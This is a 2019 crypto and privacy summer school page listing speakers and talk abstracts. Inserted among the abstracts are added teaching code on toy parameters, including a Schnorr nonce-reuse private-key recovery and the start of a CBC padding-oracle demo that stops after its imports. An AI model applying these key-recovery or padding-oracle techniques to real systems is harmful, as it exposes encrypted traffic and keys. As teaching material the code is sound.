Summer School on real-world crypto and privacy
June 17–21, 2019
Šibenik, Croatia
Speakers

List of confirmed speakers

  • Sadia Afroz, UC Berkeley, USA
    (Talk 1) Title: Differential treatment of web users: Tor blocking
    (Talk 2) Title: Differential treatment of web users: regional blocking

  • Lujo Bauer, Carnegie Mellon University, USA
    Title: Adversarial machine learning: curiosity, benefit, or threat?

  • Karthikeyan Bhargavan, INRIA (Paris), France
    (Talk 1) Title: Towards High-Assurance Cryptographic Systems
    (Talk 2) Title: Verified Cryptography for Verified Protocols

  • Joan Daemen, Radboud University, The Netherlands
    Title: What makes a cipher efficient? Design choices and relevant metrics

  • Daniel Gruss, TU Graz, Austria
    (Talk 1) Title: Introduction to Microarchitectural Attacks
    (Talk 2) Title: Transient Execution Attacks

  • Seda Gürses, KU Leuven, Belgium
    (Talk 1) Title: Privacy Research Paradigms in Computer Science
    (Talk 2) Title: POTs: The revolution will not be optimized?

  • Annelie Heuser, CNRS (IRISA), France
    (Talk 1) Title: Introduction to Profiled Side-channel Attacks
    (Talk 2) Title: Recent advances in side-channel analysis using machine learning techniques

  • Andreas Hülsing, TU Eindhoven, The Netherlands
    (Talk 1) Title: Introduction to the theory of secret key cryptography
    (Talk 2) Title: Hash functions in a post-quantum world

  • Tibor Jager, Paderborn University, Germany
    (Talk 1) Title: Real-World AKE
    (Talk 2) Title: Public-key 0-RTT protocols

  • Elif Bilge Kavun, The University of Sheffield, UK
    (Talk 1) Title: Resource-efficient Cryptography for Ubiquitous Computing
    (Talk 2) Title: Challenges in Real-world "Secure" Cryptographic Hardware Implementations

  • Engin Kirda, Northeastern University, USA
    (Talk 1) Title: Selected Topics in Web Security
    (Talk 2) Title: Advanced Malware: Attacks, Defenses, and Open Challenges

  • Anja Lehmann, IBM Research, Switzerland
    (Talk 1) Title: Updatable Encryption & Key Rotation
    (Talk 2) Title: Group Signatures - Concepts, New Advances and Applications

  • Emmanuel Prouff, ANSSI, France
    Title: Deep Learning for Embedded Security Evaluation

  • Mariana Raykova, Google, USA
    (Talk 1) Title: Introduction to Privacy Preserving Computation
    (Talk 2) Title: PanORAMa: Oblivious RAM with Logarithmic Overhead

  • Ahmad-Reza Sadeghi, TU Darmstadt, Germany
    Title: From Smart Cities to Smart Sex Toys: A Hitchhiker’s Security & Privacy Guide to The Galaxy of Things

  • Patrick Schaumont, Virginia Tech, USA
    Title: Hardware Acceleration in Cryptography

  • Benjamin Smith, INRIA and École Polytechnique, France
    Title: Public-key cryptosystems from groups and group actions

  • Juraj Somorovsky, Ruhr-Universität Bochum, Germany
    (Talk 1) Title: Scalable Scanning and Automatic Classification of TLS Padding Oracle Vulnerabilities
    (Talk 2) Title: Efail attack and its implications

  • Gilles Van Assche, STMicroelectronics, Belgium
    Title: Overview of the sponge, duplex and Farfalle constructions

  • Ingrid Verbauwhede, KU Leuven, Belgium
    Title: The need for Hardware roots of trust

Abstracts

  • Sadia Afroz, UC Berkeley, USA
  • (Talk 1) Title: Differential treatment of web users: Tor blocking
    Abstract: One of the Internet's greatest strengths is the degree to which it facilitates access to any of its resources from users anywhere in the world. However, users receive differential treatment on the web for using anonymity networks, such as Tor, and for accessing the web from certain regions. In this talk, I will discuss methodologies to measure the server-side blocking for Tor, understand why blocking happens and discuss solutions to mitigate Tor blocking.

    (Talk 2) Title: Differential treatment of web users: regional blocking
    Abstract: One of the Internet's greatest strengths is the degree to which it facilitates access to any of its resources from users anywhere in the world. However, users receive differential treatment on the web for using anonymity networks, such as Tor, and for accessing the web from certain regions. In this talk, I will discuss three reasons for the closed web that are not caused by government censorship: blocking visitors from the EU to avoid GDPR compliance, blocking based upon the visitor's country, and blocking due to security concerns. These decisions can have an adverse effect on the people of the blocked regions, especially for the developing regions. With many key services, such as education, commerce, and news, offered by a small number of web-based Western companies who might not view the developing world as worth the risk, this indiscriminate blanket blocking could slow the growth of blocked developing regions.

  • Lujo Bauer, Carnegie Mellon University, USA
  • Title: Adversarial machine learning: curiosity, benefit, or threat?
    Abstract: This talk examines to what extent we should be concerned about the increasing use of machine-learning (ML) algorithms in safety- and security-critical applications. Focusing on state-of-the-art face-recognition algorithms, I will show that machine learning can be vulnerable to _physically realizable_ and _inconspicuous_ attacks, allowing attackers to evade recognition or impersonate specific people in practical settings. I will describe a systematic method to automatically generate such attacks, which are realized through printing a pair of eyeglass frames on a consumer photo printer. I will also discuss other domains where such attacks may play a role, as well as whether similar techniques can be used to help, instead of hinder, security and privacy.

  • Karthikeyan Bhargavan, INRIA (Paris), France
  • (Talk 1) Title: Towards High-Assurance Cryptographic Systems
    Abstract: Despite careful review and expert programmers, cryptographic mechanisms and their software implementations continue to be plagued by design flaws and programming bugs. In this lecture, we will study the root causes behind some of these bugs and see how formal verification can help find and prevent them. Using examples from the recent analyses of the TLS protocol, we will see how tools like ProVerif can find logical flaws in protocol designs, and how programming languages like F* can be used to build high-assurance cryptographic software. Students who wish to get a head start are encouraged to download, install and play with ProVerif on their computers. Students who wish to survey the larger research area may also want to experiment with tools like Tamarin, EasyCrypt, and CryptoVerif.

    Download ProVerif (url), the user manual and tutorial (url)

    (Talk 2) Title: Verified Cryptography for Verified Protocols
    Abstract: We will build a verified implementation of a cryptographic algorithm in F* and compile it to portable C and WebAssembly. We will learn how to prove that our code is memory safe, functionally correct, and secret independent (“constant-time”). We will also learn how to link and deploy our verified crypto code with larger verified codebases that implement real-world protocols like TLS or Signal. Students are encouraged to install and experiment with F* before this lecture, but the lecture will be self-contained.

    Download F* (url), and the online tutorial (url)

  • Joan Daemen, Radboud University, The Netherlands
  • Title: What makes a cipher efficient? Design choices and relevant metrics
    Abstract: In the last 25 years of the 20th century, mainstream block cipher research was focused on the design and analysis of the non-linear component in these ciphers: the S-boxes. These were seen as the single security-determining component in a block cipher. After the standardization of Rijndael as AES, the community shifted its attention to MDS mappings, mostly attempting to build MDS (or near-MDS) mappings with the lowest possible implementation cost. In the 21st century we have seen an explosion of new block ciphers, most of them borrowing building blocks and design approaches from older designs. Additionally, due to the success of the sponge and duplex constructions multiple research teams have been designing their own cryptographic permutation.

    So we are now confronted with a wide variety of block ciphers and permutations on the one hand, and a large number of attack techniques on the other. What the vast majority of these ciphers share is that they are iterative: they consist of the repeated application of a round function. When choosing the number of rounds, one estimates the number of rounds required to provide resistance against the best known attack and one adds some rounds as a safety margin. The choice of the number of rounds is essential to strike a good compromise between efficiency and safety margin.

    Given a round function, choosing the number of rounds requires a good understanding of cryptanalysis. However, the design choices made before doing this analysis have a dramatic impact on the applicability of types of cryptanalysis. I will discuss these choices for round functions that have as non-linear step an S-box layer, often (incorrectly) called substitution-permutation networks (SPN). These choices are mainly the S-box width, state layout and alignment. To reason about these design choices, we introduce metrics for the linear part of the round function that allow us to quantify its relevant properties with respect to known types of cryptanalysis.

  • Daniel Gruss, TU Graz, Austria
  • (Talk 1) Title: Introduction to Microarchitectural Attacks
    Abstract: In this talk we will learn how to build basic microarchitectural attacks. This includes side-channel attacks like Flush+Reload on the cache, and fault attacks like Rowhammer on the DRAM. We will gain a deep understanding of how these basic techniques work and see how they can be applied in more complex attacks. Some of these attacks are transient execution attacks, such as Meltdown, Spectre, and Foreshadow. We will discuss defenses against microarchitectural attacks and see which building blocks they aim to break. Yet, we will find that some attacks are not yet mitigated and several challenges around microarchitectural attacks and defenses remain unsolved, leaving an open field for future research.

    (Talk 2) Title: Transient Execution Attacks
    Abstract: In this talk we will deepen our understanding of transient execution attacks and defenses. We will discuss the differences between all the Spectre variants in terms of microarchitectural (prediction) elements, the attacker model, and the attack strategy. We will discuss blank spots that we should look at in the future.

    With this knowledge we are prepared to discuss which defenses against transient execution attacks are effective. We will see that there are good defenses, but most are neither effective nor efficient. Finally we will discuss how future defenses should be designed.

  • Seda Gürses, KU Leuven, Belgium
  • (Talk 1) Title: Privacy Research Paradigms in Computer Science
    Abstract: Since the end of the 60s, computer scientists have engaged in research on privacy and information systems. Over the years, this research has led to a whole palette of "privacy solutions". These solutions originate from diverse sub-fields of computer science, e.g., security engineering, databases, software engineering, HCI, and artificial intelligence. From a bird's eye view, all of these researchers are studying privacy. However, a closer look reveals that each community of researchers relies on different, sometimes even conflicting, definitions of privacy, and on a variety of social and technical assumptions. These researchers do have a tradition of assessing the (implicit) definitions and assumptions that underlie the studies in their respective sub-disciplines. This talk will provide a systematic overview of privacy research practice across the different computer science communities with an eye on the role they play in privacy engineering.

    (Talk 2) Title: POTs: The revolution will not be optimized?
    Abstract: The shift from packaged software and PCs to services and clouds, enabling distributed architectures that incorporate real-time feedback from users, has wide-ranging implications for associated risks and the design of protective technologies. In particular, with the move to services and clouds, digital systems became layers of technologies metricized under the authority of objective functions. This means that in contrast to "information systems" that focused on storage, processing and transport of information, and organizing knowledge - with associated risks of surveillance - contemporary systems leverage the knowledge they gather to not only understand the world, but also to optimize it, seeking maximum extraction of economic value through the capture and manipulation of people’s activities and environments. This ability to sense and co-create in the service of profit comes with new risks and harms such as social sorting, mass manipulation, asymmetrical concentration of resources, majority dominance, and minority erasure.

    Protective optimization technologies (POTs) are a response to optimization systems' negative effects on users and local environments. POTs analyze how events (or lack thereof) inferred, induced or shaped by optimization systems affect users and environments, then manipulate these events to influence system outcomes, e.g., by altering the optimization constraints and poisoning system inputs. During this talk I will describe optimization systems, demonstrate problems associated with these systems, and how POTs can protect users against these.

  • Annelie Heuser, CNRS (IRISA), France
  • (Talk 1) Title: Introduction to Profiled Side-channel Attacks
    Abstract: In this talk, we will learn about side-channel analysis of embedded devices and recap classical profiled side-channel attacks. Nowadays, embedded devices are often performing security, privacy, and/or security-critical tasks. In this talk, we show how to reveal sensitive information using power consumption or electromagnetic emanation even when protected with cryptographic primitives. Special attention will be given to profiled attacks, where the assumption is made that an attacker is able to retrieve additional information in a learning phase from a similar device to the one under attack. We will detail classical profiled side-channel attacks such as template attacks and the stochastic approach using practical examples.

    (Talk 2) Title: Recent advances in side-channel analysis using machine learning techniques
    Abstract: The core problem faced in side-channel analysis can be translated into common problems given in classical tasks for machine learning. It is therefore natural to use and exploit standard machine learning techniques to reveal sensitive data using side-channel information.

    In this talk, we will discuss recent advances made in the field of side-channel analysis using machine learning and deep learning techniques. This includes reshaping the underlying side-channel scenario with semi-supervised techniques, discussing evaluation metrics, and enhancing side-channel classification techniques.

  • Andreas Hülsing, TU Eindhoven, The Netherlands
  • (Talk 1) Title: Introduction to the theory of secret key cryptography
    Abstract: This lecture will revisit the basic primitives in secret key cryptography: secret key encryption, cryptographic hash functions, pseudorandom functions and message authentication codes. The lecture will cover the most relevant security notions and generic constructions.

    (Talk 2) Title: Hash functions in a post-quantum world
    Abstract: This talk will discuss several aspects of the theory of cryptographic hash functions that suddenly change when considering adversaries equipped with a quantum computer. For example, previous results on the conventional hardness of certain security properties do not apply, or conventional security properties might not be sufficient anymore. The talk will cover bounds on the quantum hardness of traditional hash function properties as well as new quantum-security properties for hash functions. Afterwards, the talk will move on to a new conventional security notion for hash functions that is motivated by applications in the post-quantum world.

  • Tibor Jager, Paderborn University, Germany
  • (Talk 1) Title: Real-World AKE
    Abstract: This lecture will give an overview of real-world authenticated key exchange protocols. We will cover basic protocols and security properties, such as Forward Security. Then we give an overview of TLS, considering in particular the most recent version 1.3. We explain different design decisions, discuss novel features such as the 0-RTT mode that minimizes latency, and point to potential weaknesses, such as replay attacks and vulnerabilities in applications with backwards compatibility requirements.

    (Talk 2) Title: Public-key 0-RTT protocols
    Abstract: Reducing latency overhead while maintaining critical security guarantees, such as forward secrecy, has become a major design goal for modern key exchange protocols, both in academia and industry. Of particular interest in this regard are 0-RTT protocols, a class of KE protocols which allow a client to send cryptographically protected payload in "zero round-trip times" (0-RTT) along with the very first KE protocol message, thereby minimizing latency. Prominent examples are Google's QUIC protocol, Facebook's Zero protocol, and the recent TLS version 1.3. The main challenge in a 0-RTT key exchange is to achieve forward secrecy and security against replay attacks for the very first payload message. Originally, this was believed to be impossible, but more recently it was shown that this belief is actually false. This lecture explains techniques to construct secure 0-RTT protocols, which may have interesting applications beyond key exchange, for instance to forward-secure instant messaging.

  • Elif Bilge Kavun, The University of Sheffield, UK
  • (Talk 1) Title: Resource-efficient Cryptography for Ubiquitous Computing
    Abstract: Compactness and mobility of very small-scale computing devices allow them to be deployed "pervasively" – such as in smart homes, logistics, e-commerce, and medical technology. Embedding these devices into everyday objects also indicates the realization of the foreseen "ubiquitous computing" concept. However, this in turn brought some concerns, especially security and privacy.

    For ubiquitous computing, the adversary model and the security level are not the same as in traditional applications due to limited resources in pervasive devices – area, power, and energy are actually harsh constraints for such devices. Unfortunately, the existing cryptographic solutions are generally quite heavy for these ubiquitous applications. In order to address the security problem of resource-constrained devices, "lightweight cryptography" was defined nearly two decades ago and many different lightweight cryptographic primitives have already been proposed. Initial studies mostly dealt with hardware cost reduction. However, this is not the only important metric for such devices. Depending on the application, resource-constrained devices may need lightweight ciphers to be executed in one clock cycle, which still achieve a certain security level and a small footprint. Furthermore, as most of the pervasive computing applications are implemented in software on embedded microcontrollers, there is also a need for lightweight ciphers that result in efficient code size and execution time.

    In this talk, lightweight cryptography is understood as "resource-efficient cryptography". First, existing lightweight ciphers focusing on low-area will be introduced. Following that, other "resource-efficient" cipher solutions for resource-constrained devices addressing the mentioned gaps in lightweight cryptography will be explained. Finally, implementation techniques and cipher proposals towards "side-channel protected" resource-efficient cryptography will be presented.

    (Talk 2) Title: Challenges in Real-world "Secure" Cryptographic Hardware Implementations
    Abstract: Physical attacks against cryptographic hardware implementations have been very powerful at revealing the secret information of cryptographic devices. These attacks can be active or passive - in other words, listening to the side-channel information of the device or invasively/semi-invasively (and sometimes even non-invasively) faulting the behavior of the device in order to gather the secret.

    Many techniques have been proposed against these attacks; for example, masking is the most straightforward technique against side-channel attacks and redundancy is a very common technique against fault attacks. In "real-world" cryptographic hardware, one has to protect the device from all of these attacks. This means implementing different countermeasures at the same time, which in turn can bring conflicts as well as cost problems. For instance, many masking techniques against side-channel attacks require fresh randomness in every clock cycle in addition to mask shares, which means that a large amount of randomness has to be generated on the chip. Furthermore, security-critical parts of the device have to be implemented redundantly against fault attacks.

    Many devices and applications cannot afford the large area and high power consumption caused by implementing all these countermeasures at the same time. Sometimes, it is even too complex for the synthesizer to compile and optimize the implementation successfully. Furthermore, in order to make sure that one countermeasure does not conflict with another one, security verification has to be performed repeatedly before silicon, which is a time-consuming process.

    In this talk, such challenges will be presented not only from an academic view, but also from an industry perspective. Some practical solutions will be presented and the countermeasures in the literature addressing both active and passive attacks will be explained.

  • Engin Kirda, Northeastern University, USA
  • (Talk 1) Title: Selected Topics in Web Security
    Abstract: Attacks against web applications are very common on the Internet, and miscreants often target web applications to gain an initial cyber-foothold in an organization. This lecture aims to discuss some practical, current topics in web security. It will discuss a number of problems, the solutions that have been proposed, and some open research challenges that remain.

    (Talk 2) Title: Advanced Malware: Attacks, Defenses, and Open Challenges
    Abstract: Although much research work has been done on analyzing, detecting, and mitigating malware, it still remains one of the most pressing problems on the Internet today. Unfortunately, malware is often a component in most of the cyber-attacks we are observing against organizations. This lecture will give an overview of advanced malware, and will discuss some of the current attacks, the defenses that are in place (including their strengths and weaknesses), and the current open challenges that the research community is facing.

  • Anja Lehmann, IBM Research, Switzerland
  • (Talk 1) Title: Updatable Encryption & Key Rotation
    Abstract: An updatable encryption scheme allows one to periodically rotate the encryption key and move already existing ciphertexts from the old to the new key. Rotation of the encryption key is a common requirement in practice in order to mitigate the impact of key compromises over time. The ciphertext updates are done with the help of a so-called update token and can be performed by an untrusted party, as the update never decrypts the data. Updatable encryption is particularly useful in settings where encrypted data is outsourced, e.g., stored on a cloud server. The data owner can produce an update token, and the cloud server can update the ciphertexts. I'll give an overview of the different types of updatable encryption schemes, their desirable security properties and provably-secure instantiations.
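    The owner/server flow described above, as an added example that is not the speaker's code or any library's: a toy ElGamal-style updatable encryption scheme (constructed here, with deliberately tiny parameters) in which the data owner derives an update token from the old and new key, and an untrusted server re-keys a ciphertext using only that token, never decrypting it.

```python
"""Toy updatable encryption via a key-rotation token (constructed example).

Structure: ElGamal-style ciphertext (y^r, g^r * m) with y = g^k in a prime-order
group. A token delta = k_new / k_old mod q lets a server re-key ciphertexts.
"""
import secrets
from typing import Tuple

# Constructed toy parameters: safe prime P = 2Q + 1, G = 4 generates the
# order-Q subgroup of quadratic residues. Far too small for any real use.
P = 1019
Q = 509
G = 4

Ciphertext = Tuple[int, int]
Token = Tuple[int, int]


def encode(x: int) -> int:
    """Map an integer message 1 <= x <= Q into the subgroup as x^2 mod P."""
    if not 1 <= x <= Q:
        raise ValueError("message out of range")
    return x * x % P


def decode(m: int) -> int:
    """Inverse of encode: square root mod P (P = 3 mod 4), then the root <= Q."""
    r = pow(m, (P + 1) // 4, P)
    return min(r, P - r)


def keygen() -> int:
    """Secret key k in [1, Q-1]; the public element y = G^k is derived on demand."""
    return secrets.randbelow(Q - 1) + 1


def encrypt(k: int, m: int) -> Ciphertext:
    """Ciphertext (y^r, G^r * m) with y = G^k and fresh randomness r."""
    r = secrets.randbelow(Q - 1) + 1
    y = pow(G, k, P)
    return (pow(y, r, P), pow(G, r, P) * m % P)


def decrypt(k: int, ct: Ciphertext) -> int:
    """Recover m = c2 / c1^(1/k); c1^(1/k) = G^r because c1 = G^(k r)."""
    c1, c2 = ct
    g_r = pow(c1, pow(k, -1, Q), P)
    return c2 * pow(g_r, -1, P) % P


def token(k_old: int, k_new: int) -> Token:
    """Data owner derives the update token: delta = k_new / k_old mod Q, plus y_new.

    Caveat: delta together with k_old reveals k_new, so an adversary must never
    obtain both; this is inherent to this kind of token-based rotation.
    """
    return (k_new * pow(k_old, -1, Q) % Q, pow(G, k_new, P))


def update(tok: Token, ct: Ciphertext) -> Ciphertext:
    """Untrusted server re-keys a ciphertext without any decryption.

    c1' = c1^delta * y_new^r2 = G^(k_new (r + r2)),  c2' = c2 * G^r2 = G^(r + r2) * m,
    i.e. a fresh-looking encryption of m under k_new with randomness r + r2.
    """
    delta, y_new = tok
    c1, c2 = ct
    r2 = secrets.randbelow(Q - 1) + 1
    return (pow(c1, delta, P) * pow(y_new, r2, P) % P, c2 * pow(G, r2, P) % P)


def rotate_demo(message: int, k_old: int, k_new: int) -> int:
    """One rotation epoch: encrypt under k_old, re-key on the server, decrypt under k_new."""
    ct_old = encrypt(k_old, encode(message))
    tok = token(k_old, k_new)        # computed by the owner, who holds both keys
    ct_new = update(tok, ct_old)     # performed by the server, which holds no key
    return decode(decrypt(k_new, ct_new))


if __name__ == "__main__":
    k1, k2 = keygen(), keygen()
    print("recovered after rotation:", rotate_demo(42, k1, k2))
```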

    (Talk 2) Title: Group Signatures - Concepts, New Advances and Applications
    Abstract: Group signatures allow members of a group to anonymously produce signatures on behalf of the group. They are an important building block for privacy-enhancing applications, e.g., enabling user data to be collected in authenticated form while preserving the user's privacy. I'll give an introduction to the area of group signatures and related concepts, and also discuss two recent results: First, I'll present a new approach for managing the linkability between group signatures in a flexible manner, which plays a crucial role for balancing utility and privacy. Second, I'll discuss the application of group signatures for vehicle-to-vehicle (V2V) communication systems that are currently being prepared for real-world deployment, but face strong opposition over privacy issues.

  • Emmanuel Prouff, ANSSI, France
  • Title: Deep Learning for Embedded Security Evaluation
    Abstract: To provide assurance on the resistance of a system against side-channel analysis, several national or private schemes are today promoting an evaluation strategy, common in classical cryptography, which focuses on the most powerful adversary who may train to learn about the dependency between the device behaviour and the sensitive data values. Several works have shown that this kind of analysis, known as Template Attacks in the side-channel domain, can be rephrased as a classical Machine Learning classification problem with a learning phase. Following the current trend in the latter area, recent works have demonstrated that deep learning algorithms are very efficient at conducting security evaluations of embedded systems and have many advantages compared to the other methods. During the proposed presentation, I will revisit these recent works and will identify some avenues for further research on this topic.

  • Mariana Raykova, Yale University, USA
  • (Talk 1) Title: Introduction to Privacy Preserving Computation
    Abstract: This talk will introduce the concept of privacy preserving computation, which considers data privacy guarantees beyond protecting data at rest and in transit, and focuses on the more challenging goal of protecting private data while computing on it. I will cover some basic formal security definitions and the corresponding cryptographic primitives that aim to achieve them. I will focus on the notions of secure multiparty computation and zero knowledge proofs. I will cover some basic techniques for constructions of these tools as well as overview of what is possible to achieve today with existing constructions from practical perspective.

    (Talk 2) Title: PanORAMa: Oblivious RAM with Logarithmic Overhead
    Abstract: We present PanORAMa, the first Oblivious RAM construction that achieves communication overhead O(log N · log log N) for a database of N blocks and for any block size B = Ω(log N) while requiring client memory of only a constant number of memory blocks. Our scheme is only an O(log log N) factor away from the Ω(log N) lower bound shown by Larsen and Nielsen [CRYPTO '18].

    Our construction follows the hierarchical approach to ORAM design and relies on two main building blocks of independent interest: a new oblivious hash table construction with improved amortized O(log N + poly(log log λ)) communication overhead for security parameter λ and N = poly(λ), assuming its input is randomly shuffled; and a complementary new oblivious random multi-array shuffle construction, which shuffles N blocks of data with communication O(N log log λ + N log N / log λ) when the input has a certain level of entropy. We combine these two primitives to improve the shuffle time in our hierarchical ORAM construction by avoiding heavy oblivious shuffles and leveraging entropy remaining in the merged levels from previous shuffles. As a result, the amortized shuffle cost is asymptotically the same as the lookup complexity in our construction.

    This is a joint work with Sarvar Patel, Giuseppe Persiano and Kevin Yeo.

  • Ahmad-Reza Sadeghi, TU Darmstadt, Germany
  • Title: From Smart Cities to Smart Sex Toys: A Hitchhiker’s Security & Privacy Guide to The Galaxy of Things
    Abstract: The Internet of Things (IoT) is rapidly growing into the Internet of Everything, constantly expanded by new device manufacturers that are entering the market of internet-connected appliances for smart cities, homes, offices, etc. The appliances combine smart devices (ranging from motion sensors and traffic lights to virtual voice assistants) and smart services, including the almost invisible backend infrastructure (e.g., cloud/relay/update servers), all of which eagerly collect users’ data.

    However, due to a lack of security by design and flawed implementations, we are facing significant security and privacy challenges specific to IoT, such as perilous IoT botnet attacks and new privacy threats caused by the widespread installation of wireless sensors, actuators and smart environment appliances even in the highly private setting of our homes - not even smart sex toys are safe. Unfortunately, standard security measures like encrypted communications do not protect against many of these threats.

    The massive scale of the IoT device population and the enormous diversity of device hardware, operating systems, software frameworks, protocols, and manufacturers make it almost impossible to establish standards for IoT security and privacy-protecting solutions. Even worse, simply applying and extending known solutions, whether per-device security architectures or network security measures, is not sufficient to secure the IoT. In particular, existing intrusion detection techniques seem ineffective at detecting compromised IoT devices.

    In this talk, we present a compact overview of various attacks on IoT systems and recent works (including ours) on addressing the diverse security and privacy challenges in the growing IoT landscape. In particular, we focus on approaches for automated device identification and reliable detection of compromised devices based on their inherent communication behavior. In this context we may use other buzzwords like (adversarial) machine learning, and if time allows, even blockchains.

  • Patrick Schaumont, Virginia Tech, USA
  • Title: Hardware Acceleration in Cryptography
    Abstract: Although the bulk of information security is driven by software, the hardware implementation of cryptography can still be essential to meet performance and energy efficiency constraints. The specialized structures of a hardware implementation lead to highly energy-efficient design. This improves the battery life of mobile applications, and it reduces the power consumption of high-performance cloud applications.

    The objective of hardware-accelerated cryptography is to integrate specialized hardware seamlessly into a system application with minimal overhead. Additional considerations include proper isolation of hardware-based secrets from unauthorized access, as well as the protection of those secrets against specific hardware attacks.

    We discuss various form factors for hardware/software interfaces that integrate hardware crypto modules into the system software. We describe loosely-coupled memory-mapped structures and tightly-coupled custom instructions. Next, we discuss techniques that are used to transform sequential algorithms into parallel architectures, and we consider the application of those techniques to the hardware acceleration of cryptography.

    Throughout the talk, we illustrate the design concepts with examples of hardware acceleration of secret-key and public-key cryptography.

  • Benjamin Smith, INRIA and École Polytechnique, France
  • Title: Public-key cryptosystems from groups and group actions
    Abstract: This talk will begin by setting out the common background in public-key cryptography required throughout the rest of the school. We will focus on key exchange and signatures, the most fundamental problems, taking our examples from the simplest classical arena: group-based cryptography, where security is predicated on the supposed hardness of the Discrete Logarithm Problem. We will describe not only the "textbook" versions of basic protocols in elliptic curve cryptography, but also the most efficient variants used in real-world cryptosystems today. If time permits, we will briefly show one way to take these protocols forward into a post-quantum future where discrete logarithms are easy: group-action and isogeny-based cryptography.
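
    The two "textbook" protocols the abstract names, Diffie-Hellman key exchange and Schnorr signatures in a prime-order subgroup of Z_p^*, as an added worked example; this is not the speaker's code. It assumes constructed toy parameters (safe prime p = 2039 = 2q + 1, q = 1019, generator g = 4 of the order-q subgroup) precisely so that the discrete logarithm can be brute-forced at the end, which is the point the abstract makes about where the security comes from: a deployment needs a group with a ~256-bit q (or an elliptic curve) where that search is infeasible. The subgroup membership check in the key exchange and the nonce-reuse key recovery are the two real-world pitfalls a practitioner should see alongside the textbook versions.

```python
import hashlib
import secrets

# Toy parameters (constructed for this example): safe prime P = 2*Q + 1, G = 2^2 has order Q.
P, Q, G = 2039, 1019, 4


def _i2b(n, p):
    return n.to_bytes((p.bit_length() + 7) // 8, "big")


def keygen(p=P, q=Q, g=G):
    """Secret exponent x in [1, q-1] and public element y = g^x mod p."""
    x = secrets.randbelow(q - 1) + 1
    return x, pow(g, x, p)


def dh_shared(my_secret, their_public, p=P, q=Q):
    """Diffie-Hellman: derive a key from their_public^my_secret, after checking that
    the received element really lies in the order-q subgroup (rejects 1, p-1 and
    other small-order elements that would leak bits of my_secret)."""
    if not 1 < their_public < p or pow(their_public, q, p) != 1:
        raise ValueError("public value not in the order-q subgroup")
    z = pow(their_public, my_secret, p)
    return hashlib.sha256(_i2b(z, p)).digest()  # hash, never use z directly as a key


def _challenge(r, msg, p, q):
    h = hashlib.sha256(_i2b(r, p) + msg).digest()
    return int.from_bytes(h, "big") % q


def schnorr_sign(x, msg, k=None, p=P, q=Q, g=G):
    """Schnorr signature (e, s): r = g^k, e = H(r || m), s = k - x*e mod q.
    k must be fresh and secret for every signature; the k parameter exists
    only so the nonce-reuse failure can be demonstrated below."""
    if k is None:
        k = secrets.randbelow(q - 1) + 1
    r = pow(g, k, p)
    e = _challenge(r, msg, p, q)
    return e, (k - x * e) % q


def schnorr_verify(y, msg, sig, p=P, q=Q, g=G):
    """Recompute r = g^s * y^e = g^(k - xe) * g^(xe) = g^k and compare challenges."""
    e, s = sig
    if not (0 <= e < q and 0 <= s < q):
        return False
    r = pow(g, s, p) * pow(y, e, p) % p
    return _challenge(r, msg, p, q) == e


def recover_key_from_nonce_reuse(sig1, sig2, q=Q):
    """Two signatures with the same k on different messages give
    s1 - s2 = x*(e2 - e1), so x = (s2 - s1) / (e1 - e2) mod q."""
    (e1, s1), (e2, s2) = sig1, sig2
    return (s2 - s1) * pow(e1 - e2, -1, q) % q


def brute_force_dlog(y, p=P, q=Q, g=G):
    """Solve g^x = y by exhaustive search: feasible here only because q is tiny."""
    acc = 1
    for x in range(q):
        if acc == y:
            return x
        acc = acc * g % p
    return None


if __name__ == "__main__":
    a, A = keygen()
    b, B = keygen()
    print("shared keys agree:", dh_shared(a, B) == dh_shared(b, A))
    x, y = keygen()
    print("signature verifies:", schnorr_verify(y, b"pay 10", schnorr_sign(x, b"pay 10")))
    print("recovered x by brute force:", brute_force_dlog(y) == x)
```

    Every function takes the group as keyword parameters, so the same code runs unchanged with a real MODP group; only brute_force_dlog stops being practical, which is exactly the hardness assumption the abstract refers to.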

  • Juraj Somorovsky, Ruhr-Universität Bochum, Germany
  • (Talk 1) Title: Scalable Scanning and Automatic Classification of TLS Padding Oracle Vulnerabilities
    Abstract: The TLS protocol provides encryption, data integrity, and authentication on the modern Internet. Despite the protocol's importance, currently-deployed TLS versions use obsolete cryptographic algorithms which have been broken using various attacks. One prominent class of such attacks is CBC padding oracle attacks. These attacks allow an adversary to decrypt TLS traffic by observing different server behaviors which depend on the validity of CBC padding.

    We present the first large-scale scan for CBC padding oracle vulnerabilities in TLS implementations on the modern Internet. Our scan revealed vulnerabilities in 1.83% of the Alexa Top Million websites, detecting nearly 100 different vulnerabilities. Our scanner observes subtle differences in server behavior, such as responding with different TLS alerts, or with different TCP header flags.

    We used a novel scanning methodology consisting of three steps. First, we created a large set of probes that detect vulnerabilities at a considerable scanning cost. We then reduced the number of probes using a preliminary scan, such that a smaller set of probes has the same detection rate but is small enough to be used in large-scale scans. Finally, we used the reduced set to scan at scale, and clustered our findings with a novel approach using graph drawing algorithms.

    Contrary to common wisdom, exploiting CBC padding oracles does not necessarily require performing precise timing measurements. We detected vulnerabilities that can be exploited simply by observing the content of different server responses. These vulnerabilities pose a significantly larger threat in practice than previously assumed.

    The talk is based on our papers published at USENIX Security 2018 and 2019.

    (Talk 2) Title: Efail attack and its implications
    Abstract: OpenPGP and S/MIME are the two prime standards for providing end-to-end security for emails. We describe novel attacks built upon a technique we call malleability gadgets to reveal the plaintext of encrypted emails. We use CBC/CFB gadgets to inject malicious plaintext snippets into encrypted emails that abuse existing and standard-conforming backchannels, for example, in HTML, CSS, or X.509 functionality, to exfiltrate the full plaintext after decryption. The attack works for emails even if they were collected long ago, and is triggered as soon as the recipient decrypts a single maliciously crafted email from the attacker.

    We devise working attacks for both OpenPGP and S/MIME encryption, and show that exfiltration channels exist for 23 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients. While it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext.

    In addition to the attacks on encryption schemes in OpenPGP and S/MIME, we give an overview of our current work targeting email signatures. We present several techniques to spoof signed emails on different levels.

    The talk is based on our papers published at USENIX Security 2018 and 2019.
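
    Both talks rest on the same CBC property, P_i = D(C_i) XOR C_{i-1}: talk 1 exploits a server that leaks whether that plaintext had valid padding, talk 2 uses a known plaintext block to make the decryption produce attacker-chosen text. The following added example (not code from the talks or their papers) shows both on one toy implementation. It assumes a constructed 4-round SHA-256 Feistel network as the block cipher so that it runs offline without third-party libraries; the attacks depend only on the CBC layer, so the cipher could be swapped for AES without changing them. The oracle models a server whose observable response (a different alert, different TCP flags) depends on padding validity, which is all the attack needs, without any timing measurement.

```python
import hashlib
import os

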